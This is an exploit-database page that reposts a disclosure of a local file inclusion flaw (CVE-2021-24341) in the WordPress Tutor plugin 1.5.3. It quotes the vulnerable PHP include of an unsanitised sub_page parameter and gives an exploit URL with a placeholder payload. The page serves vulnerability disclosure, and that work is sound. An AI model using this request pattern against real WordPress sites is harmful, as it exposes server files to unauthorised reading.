Advertisement






Wordpress Plugin tutor.1.5.3 - Local File Inclusion

CVE Category Price Severity
CVE-2021-24341 CWE-22 $500 High
Author Risk Exploitation Type Date
Unknown High Local 2020-02-12
CPE
cpe:cpe:/a:wordpress:tutor_plugin:1.5.3
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020020058

Below is a copy:

Wordpress Plugin tutor.1.5.3 - Local File Inclusion
[-] Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
[-] Author: mehran feizi
[-] Category: webapps
[-] Date: 2020.02.12
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 
7: include include $include_file; 
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: [email protected]

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum